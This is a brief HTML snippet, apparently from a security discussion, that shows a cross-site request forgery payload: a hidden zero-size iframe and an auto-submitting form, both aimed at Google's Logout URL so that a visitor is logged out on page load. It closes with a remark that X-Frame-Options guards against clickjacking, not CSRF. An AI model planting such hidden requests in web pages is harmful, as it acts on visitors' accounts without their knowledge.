<iframe src="https://accounts.google.com/Logout" width="0" height="0" ></iframe>
<form id="form" method="post" action="https://accounts.google.com/Logout"></form> <script>$('#form').submit()</script>
"X-Frame-Options" is used to defend against click-jacking attacks, not to defend against CSRF.